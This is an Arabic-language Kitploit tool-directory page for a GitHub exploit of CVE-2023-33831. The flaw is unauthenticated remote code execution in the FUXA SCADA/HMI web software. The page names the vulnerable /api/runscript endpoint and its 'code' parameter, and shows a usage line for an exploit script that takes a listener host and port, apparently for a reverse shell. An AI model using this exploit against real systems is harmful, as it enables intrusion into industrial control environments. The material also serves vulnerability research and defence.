Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Unauthenticated-RCE-FUXA-CVE-2023-33831 — وصف واستغلال لثغرة CVE-2023-33831 التي تؤثر على برنامج FUXA لتصور العمليات المستند إلى الويب (SCADA/HMI/Dashboard). | Kitploit
أدوات/GitHubGitHub/rodolfomarianocy/unauthenticated-rce-fuxa-cve-2023-33831
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالأمن SCADA/ICSاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمر
GitHubrodolfomarianocy/unauthenticated-rce-fuxa-cve-2023-33831

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →

Unauthenticated-RCE-FUXA-CVE-2023-33831

وصف واستغلال لثغرة CVE-2023-33831 التي تؤثر على برنامج FUXA لتصور العمليات المستند إلى الويب (SCADA/HMI/Dashboard).

عرض المستودع
1326منذ سنة واحدةلم تتم المراجعة بعد
مشاركة

ثغرة RCE بدون مصادقة في FUXA CVE-2023-33831

تؤثر الثغرة على مكوّن البرمجة النصية في FUXA، بسبب عدم وجود تحكم أو تعقيم على المدخلات التي يمكن للمستخدمين التحكم بها، مما يسمح باستخدام طرق خطيرة يمكن استغلالها لتنفيذ التعليمات البرمجية عن بُعد. المسار المتأثر هو /api/runscript، حيث يمكن تنفيذ الأوامر دون الحاجة إلى المصادقة عبر معامل code باستخدام طريقة POST، وذلك باستخدام وحدة child_process عبر دالة exec.


طريقة الاستخدام

root@kitploit:~
python CVE-2023-33831.py --rhost <ip> --rport <rport> --lhost <lhost> --lport <lport>

الرابط: https://www.youtube.com/watch?v=Xxa6yRB2Fpw

تنزيل الأداة